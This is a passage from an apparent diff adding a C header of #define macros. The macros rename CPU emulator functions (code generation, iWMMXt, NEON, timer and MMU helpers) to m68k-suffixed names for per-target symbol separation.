gen_iwmmxt_address_m68k +#define gen_iwmmxt_shift gen_iwmmxt_shift_m68k +#define gen_jmp gen_jmp_m68k +#define gen_load_and_replicate gen_load_and_replicate_m68k +#define gen_load_exclusive gen_load_exclusive_m68k +#define gen_logic_CC gen_logic_CC_m68k +#define gen_logicq_cc gen_logicq_cc_m68k +#define gen_lookup_tb gen_lookup_tb_m68k +#define gen_mov_F0_vreg gen_mov_F0_vreg_m68k +#define gen_mov_F1_vreg gen_mov_F1_vreg_m68k +#define gen_mov_vreg_F0 gen_mov_vreg_F0_m68k +#define gen_muls_i64_i32 gen_muls_i64_i32_m68k +#define gen_mulu_i64_i32 gen_mulu_i64_i32_m68k +#define gen_mulxy gen_mulxy_m68k 
+#define gen_neon_add gen_neon_add_m68k +#define gen_neon_addl gen_neon_addl_m68k +#define gen_neon_addl_saturate gen_neon_addl_saturate_m68k +#define gen_neon_bsl gen_neon_bsl_m68k +#define gen_neon_dup_high16 gen_neon_dup_high16_m68k +#define gen_neon_dup_low16 gen_neon_dup_low16_m68k +#define gen_neon_dup_u8 gen_neon_dup_u8_m68k +#define gen_neon_mull gen_neon_mull_m68k +#define gen_neon_narrow gen_neon_narrow_m68k +#define gen_neon_narrow_op gen_neon_narrow_op_m68k +#define gen_neon_narrow_sats gen_neon_narrow_sats_m68k +#define gen_neon_narrow_satu gen_neon_narrow_satu_m68k +#define gen_neon_negl gen_neon_negl_m68k +#define gen_neon_rsb gen_neon_rsb_m68k +#define gen_neon_shift_narrow gen_neon_shift_narrow_m68k +#define gen_neon_subl gen_neon_subl_m68k +#define gen_neon_trn_u16 gen_neon_trn_u16_m68k +#define gen_neon_trn_u8 gen_neon_trn_u8_m68k +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_m68k +#define gen_neon_unzip gen_neon_unzip_m68k +#define gen_neon_widen gen_neon_widen_m68k +#define gen_neon_zip gen_neon_zip_m68k +#define gen_new_label gen_new_label_m68k +#define gen_nop_hint gen_nop_hint_m68k +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_m68k +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_m68k +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_m68k +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_m68k +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_m68k +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_m68k +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_m68k +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_m68k +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_m68k +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_m68k +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_m68k +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_m68k +#define gen_op_iwmmxt_avgb1_M0_wRn 
gen_op_iwmmxt_avgb1_M0_wRn_m68k +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_m68k +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_m68k +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_m68k +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_m68k +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_m68k +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_m68k +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_m68k +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_m68k +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_m68k +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_m68k +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_m68k +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_m68k +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_m68k +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_m68k +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_m68k +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_m68k +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_m68k +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_m68k +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_m68k +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_m68k +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_m68k +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_m68k +#define 
gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_m68k +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_m68k +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_m68k +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_m68k +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_m68k +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_m68k +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_m68k +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_m68k +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_m68k +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_m68k +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_m68k +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_m68k +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_m68k +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_m68k +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_m68k +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_m68k +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_m68k +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_m68k +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_m68k +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_m68k +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_m68k +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_m68k +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_m68k +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_m68k +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_m68k +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_m68k +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_m68k +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_m68k +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_m68k +#define gen_op_iwmmxt_unpackhsl_M0 
gen_op_iwmmxt_unpackhsl_M0_m68k +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_m68k +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_m68k +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_m68k +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_m68k +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_m68k +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_m68k +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_m68k +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_m68k +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_m68k +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_m68k +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_m68k +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_m68k +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_m68k +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_m68k +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_m68k +#define gen_rev16 gen_rev16_m68k +#define gen_revsh gen_revsh_m68k +#define gen_rfe gen_rfe_m68k +#define gen_sar gen_sar_m68k +#define gen_sbc_CC gen_sbc_CC_m68k +#define gen_sbfx gen_sbfx_m68k +#define gen_set_CF_bit31 gen_set_CF_bit31_m68k +#define gen_set_condexec gen_set_condexec_m68k +#define gen_set_cpsr gen_set_cpsr_m68k +#define gen_set_label gen_set_label_m68k +#define gen_set_pc_im gen_set_pc_im_m68k +#define gen_set_psr gen_set_psr_m68k +#define gen_set_psr_im gen_set_psr_im_m68k +#define gen_shl gen_shl_m68k +#define gen_shr gen_shr_m68k +#define gen_smc gen_smc_m68k +#define gen_smul_dual gen_smul_dual_m68k +#define gen_srs gen_srs_m68k +#define gen_ss_advance gen_ss_advance_m68k +#define gen_step_complete_exception gen_step_complete_exception_m68k +#define gen_store_exclusive gen_store_exclusive_m68k +#define gen_storeq_reg gen_storeq_reg_m68k +#define gen_sub_carry gen_sub_carry_m68k +#define 
gen_sub_CC gen_sub_CC_m68k +#define gen_subq_msw gen_subq_msw_m68k +#define gen_swap_half gen_swap_half_m68k +#define gen_thumb2_data_op gen_thumb2_data_op_m68k +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_m68k +#define gen_ubfx gen_ubfx_m68k +#define gen_vfp_abs gen_vfp_abs_m68k +#define gen_vfp_add gen_vfp_add_m68k +#define gen_vfp_cmp gen_vfp_cmp_m68k +#define gen_vfp_cmpe gen_vfp_cmpe_m68k +#define gen_vfp_div gen_vfp_div_m68k +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_m68k +#define gen_vfp_F1_mul gen_vfp_F1_mul_m68k +#define gen_vfp_F1_neg gen_vfp_F1_neg_m68k +#define gen_vfp_ld gen_vfp_ld_m68k +#define gen_vfp_mrs gen_vfp_mrs_m68k +#define gen_vfp_msr gen_vfp_msr_m68k +#define gen_vfp_mul gen_vfp_mul_m68k +#define gen_vfp_neg gen_vfp_neg_m68k +#define gen_vfp_shto gen_vfp_shto_m68k +#define gen_vfp_sito gen_vfp_sito_m68k +#define gen_vfp_slto gen_vfp_slto_m68k +#define gen_vfp_sqrt gen_vfp_sqrt_m68k +#define gen_vfp_st gen_vfp_st_m68k +#define gen_vfp_sub gen_vfp_sub_m68k +#define gen_vfp_tosh gen_vfp_tosh_m68k +#define gen_vfp_tosi gen_vfp_tosi_m68k +#define gen_vfp_tosiz gen_vfp_tosiz_m68k +#define gen_vfp_tosl gen_vfp_tosl_m68k +#define gen_vfp_touh gen_vfp_touh_m68k +#define gen_vfp_toui gen_vfp_toui_m68k +#define gen_vfp_touiz gen_vfp_touiz_m68k +#define gen_vfp_toul gen_vfp_toul_m68k +#define gen_vfp_uhto gen_vfp_uhto_m68k +#define gen_vfp_uito gen_vfp_uito_m68k +#define gen_vfp_ulto gen_vfp_ulto_m68k +#define get_arm_cp_reginfo get_arm_cp_reginfo_m68k +#define get_clock get_clock_m68k +#define get_clock_realtime get_clock_realtime_m68k +#define get_constraint_priority get_constraint_priority_m68k +#define get_float_exception_flags get_float_exception_flags_m68k +#define get_float_rounding_mode get_float_rounding_mode_m68k +#define get_fpstatus_ptr get_fpstatus_ptr_m68k +#define get_level1_table_address get_level1_table_address_m68k +#define get_mem_index get_mem_index_m68k +#define get_next_param_value get_next_param_value_m68k +#define 
get_opt_name get_opt_name_m68k +#define get_opt_value get_opt_value_m68k +#define get_page_addr_code get_page_addr_code_m68k +#define get_param_value get_param_value_m68k +#define get_phys_addr get_phys_addr_m68k +#define get_phys_addr_lpae get_phys_addr_lpae_m68k +#define get_phys_addr_mpu get_phys_addr_mpu_m68k +#define get_phys_addr_v5 get_phys_addr_v5_m68k +#define get_phys_addr_v6 get_phys_addr_v6_m68k +#define get_system_memory get_system_memory_m68k +#define get_ticks_per_sec get_ticks_per_sec_m68k +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_m68k +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__m68k +#define gt_cntfrq_access gt_cntfrq_access_m68k +#define gt_cnt_read gt_cnt_read_m68k +#define gt_cnt_reset gt_cnt_reset_m68k +#define gt_counter_access gt_counter_access_m68k +#define gt_ctl_write gt_ctl_write_m68k +#define gt_cval_write gt_cval_write_m68k +#define gt_get_countervalue gt_get_countervalue_m68k +#define gt_pct_access gt_pct_access_m68k +#define gt_ptimer_access gt_ptimer_access_m68k +#define gt_recalc_timer gt_recalc_timer_m68k +#define gt_timer_access gt_timer_access_m68k +#define gt_tval_read gt_tval_read_m68k +#define gt_tval_write gt_tval_write_m68k +#define gt_vct_access gt_vct_access_m68k +#define gt_vtimer_access gt_vtimer_access_m68k +#define guest_phys_blocks_free guest_phys_blocks_free_m68k +#define guest_phys_blocks_init guest_phys_blocks_init_m68k +#define handle_vcvt handle_vcvt_m68k +#define handle_vminmaxnm handle_vminmaxnm_m68k +#define handle_vrint handle_vrint_m68k +#define handle_vsel handle_vsel_m68k +#define has_help_option has_help_option_m68k +#define have_bmi1 have_bmi1_m68k +#define have_bmi2 have_bmi2_m68k +#define hcr_write hcr_write_m68k +#define helper_access_check_cp_reg helper_access_check_cp_reg_m68k +#define helper_add_saturate helper_add_saturate_m68k +#define helper_add_setq helper_add_setq_m68k +#define helper_add_usaturate helper_add_usaturate_m68k +#define helper_be_ldl_cmmu 
helper_be_ldl_cmmu_m68k +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_m68k +#define helper_be_ldq_mmu helper_be_ldq_mmu_m68k +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_m68k +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_m68k +#define helper_be_ldul_mmu helper_be_ldul_mmu_m68k +#define helper_be_lduw_mmu helper_be_lduw_mmu_m68k +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_m68k +#define helper_be_stl_mmu helper_be_stl_mmu_m68k +#define helper_be_stq_mmu helper_be_stq_mmu_m68k +#define helper_be_stw_mmu helper_be_stw_mmu_m68k +#define helper_clear_pstate_ss helper_clear_pstate_ss_m68k +#define helper_clz_arm helper_clz_arm_m68k +#define helper_cpsr_read helper_cpsr_read_m68k +#define helper_cpsr_write helper_cpsr_write_m68k +#define helper_crc32_arm helper_crc32_arm_m68k +#define helper_crc32c helper_crc32c_m68k +#define helper_crypto_aese helper_crypto_aese_m68k +#define helper_crypto_aesmc helper_crypto_aesmc_m68k +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_m68k +#define helper_crypto_sha1h helper_crypto_sha1h_m68k +#define helper_crypto_sha1su1 helper_crypto_sha1su1_m68k +#define helper_crypto_sha256h helper_crypto_sha256h_m68k +#define helper_crypto_sha256h2 helper_crypto_sha256h2_m68k +#define helper_crypto_sha256su0 helper_crypto_sha256su0_m68k +#define helper_crypto_sha256su1 helper_crypto_sha256su1_m68k +#define helper_dc_zva helper_dc_zva_m68k +#define helper_double_saturate helper_double_saturate_m68k +#define helper_exception_internal helper_exception_internal_m68k +#define helper_exception_return helper_exception_return_m68k +#define helper_exception_with_syndrome helper_exception_with_syndrome_m68k +#define helper_get_cp_reg helper_get_cp_reg_m68k +#define helper_get_cp_reg64 helper_get_cp_reg64_m68k +#define helper_get_r13_banked helper_get_r13_banked_m68k +#define helper_get_user_reg helper_get_user_reg_m68k +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_m68k +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_m68k +#define 
helper_iwmmxt_addcw helper_iwmmxt_addcw_m68k +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_m68k +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_m68k +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_m68k +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_m68k +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_m68k +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_m68k +#define helper_iwmmxt_addub helper_iwmmxt_addub_m68k +#define helper_iwmmxt_addul helper_iwmmxt_addul_m68k +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_m68k +#define helper_iwmmxt_align helper_iwmmxt_align_m68k +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_m68k +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_m68k +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_m68k +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_m68k +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_m68k +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_m68k +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_m68k +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_m68k +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_m68k +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_m68k +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_m68k +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_m68k +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_m68k +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_m68k +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_m68k +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_m68k +#define helper_iwmmxt_insr helper_iwmmxt_insr_m68k +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_m68k +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_m68k +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_m68k +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_m68k +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_m68k +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_m68k +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_m68k +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_m68k +#define helper_iwmmxt_maxul 
helper_iwmmxt_maxul_m68k +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_m68k +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_m68k +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_m68k +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_m68k +#define helper_iwmmxt_minub helper_iwmmxt_minub_m68k +#define helper_iwmmxt_minul helper_iwmmxt_minul_m68k +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_m68k +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_m68k +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_m68k +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_m68k +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_m68k +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_m68k +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_m68k +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_m68k +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_m68k +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_m68k +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_m68k +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_m68k +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_m68k +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_m68k +#define helper_iwmmxt_packul helper_iwmmxt_packul_m68k +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_m68k +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_m68k +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_m68k +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_m68k +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_m68k +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_m68k +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_m68k +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_m68k +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_m68k +#define helper_iwmmxt_slll helper_iwmmxt_slll_m68k +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_m68k +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_m68k +#define helper_iwmmxt_sral helper_iwmmxt_sral_m68k +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_m68k +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_m68k +#define 
helper_iwmmxt_srll helper_iwmmxt_srll_m68k +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_m68k +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_m68k +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_m68k +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_m68k +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_m68k +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_m68k +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_m68k +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_m68k +#define helper_iwmmxt_subub helper_iwmmxt_subub_m68k +#define helper_iwmmxt_subul helper_iwmmxt_subul_m68k +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_m68k +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_m68k +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_m68k +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_m68k +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_m68k +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_m68k +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_m68k +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_m68k +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_m68k +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_m68k +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_m68k +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_m68k +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_m68k +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_m68k +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_m68k +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_m68k +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_m68k +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_m68k +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_m68k +#define helper_ldb_cmmu helper_ldb_cmmu_m68k +#define helper_ldb_mmu helper_ldb_mmu_m68k +#define helper_ldl_cmmu helper_ldl_cmmu_m68k +#define helper_ldl_mmu helper_ldl_mmu_m68k +#define helper_ldq_cmmu helper_ldq_cmmu_m68k +#define helper_ldq_mmu 
helper_ldq_mmu_m68k +#define helper_ldw_cmmu helper_ldw_cmmu_m68k +#define helper_ldw_mmu helper_ldw_mmu_m68k +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_m68k +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_m68k +#define helper_le_ldq_mmu helper_le_ldq_mmu_m68k +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_m68k +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_m68k +#define helper_le_ldul_mmu helper_le_ldul_mmu_m68k +#define helper_le_lduw_mmu helper_le_lduw_mmu_m68k +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_m68k +#define helper_le_stl_mmu helper_le_stl_mmu_m68k +#define helper_le_stq_mmu helper_le_stq_mmu_m68k +#define helper_le_stw_mmu helper_le_stw_mmu_m68k +#define helper_msr_i_pstate helper_msr_i_pstate_m68k +#define helper_neon_abd_f32 helper_neon_abd_f32_m68k +#define helper_neon_abdl_s16 helper_neon_abdl_s16_m68k +#define helper_neon_abdl_s32 helper_neon_abdl_s32_m68k +#define helper_neon_abdl_s64 helper_neon_abdl_s64_m68k +#define helper_neon_abdl_u16 helper_neon_abdl_u16_m68k +#define helper_neon_abdl_u32 helper_neon_abdl_u32_m68k +#define helper_neon_abdl_u64 helper_neon_abdl_u64_m68k +#define helper_neon_abd_s16 helper_neon_abd_s16_m68k +#define helper_neon_abd_s32 helper_neon_abd_s32_m68k +#define helper_neon_abd_s8 helper_neon_abd_s8_m68k +#define helper_neon_abd_u16 helper_neon_abd_u16_m68k +#define helper_neon_abd_u32 helper_neon_abd_u32_m68k +#define helper_neon_abd_u8 helper_neon_abd_u8_m68k +#define helper_neon_abs_s16 helper_neon_abs_s16_m68k +#define helper_neon_abs_s8 helper_neon_abs_s8_m68k +#define helper_neon_acge_f32 helper_neon_acge_f32_m68k +#define helper_neon_acge_f64 helper_neon_acge_f64_m68k +#define helper_neon_acgt_f32 helper_neon_acgt_f32_m68k +#define helper_neon_acgt_f64 helper_neon_acgt_f64_m68k +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_m68k +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_m68k +#define helper_neon_addl_u16 helper_neon_addl_u16_m68k +#define 
helper_neon_addl_u32 helper_neon_addl_u32_m68k +#define helper_neon_add_u16 helper_neon_add_u16_m68k +#define helper_neon_add_u8 helper_neon_add_u8_m68k +#define helper_neon_ceq_f32 helper_neon_ceq_f32_m68k +#define helper_neon_ceq_u16 helper_neon_ceq_u16_m68k +#define helper_neon_ceq_u32 helper_neon_ceq_u32_m68k +#define helper_neon_ceq_u8 helper_neon_ceq_u8_m68k +#define helper_neon_cge_f32 helper_neon_cge_f32_m68k +#define helper_neon_cge_s16 helper_neon_cge_s16_m68k +#define helper_neon_cge_s32 helper_neon_cge_s32_m68k +#define helper_neon_cge_s8 helper_neon_cge_s8_m68k +#define helper_neon_cge_u16 helper_neon_cge_u16_m68k +#define helper_neon_cge_u32 helper_neon_cge_u32_m68k +#define helper_neon_cge_u8 helper_neon_cge_u8_m68k +#define helper_neon_cgt_f32 helper_neon_cgt_f32_m68k +#define helper_neon_cgt_s16 helper_neon_cgt_s16_m68k +#define helper_neon_cgt_s32 helper_neon_cgt_s32_m68k +#define helper_neon_cgt_s8 helper_neon_cgt_s8_m68k +#define helper_neon_cgt_u16 helper_neon_cgt_u16_m68k +#define helper_neon_cgt_u32 helper_neon_cgt_u32_m68k +#define helper_neon_cgt_u8 helper_neon_cgt_u8_m68k +#define helper_neon_cls_s16 helper_neon_cls_s16_m68k +#define helper_neon_cls_s32 helper_neon_cls_s32_m68k +#define helper_neon_cls_s8 helper_neon_cls_s8_m68k +#define helper_neon_clz_u16 helper_neon_clz_u16_m68k +#define helper_neon_clz_u8 helper_neon_clz_u8_m68k +#define helper_neon_cnt_u8 helper_neon_cnt_u8_m68k +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_m68k +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_m68k +#define helper_neon_hadd_s16 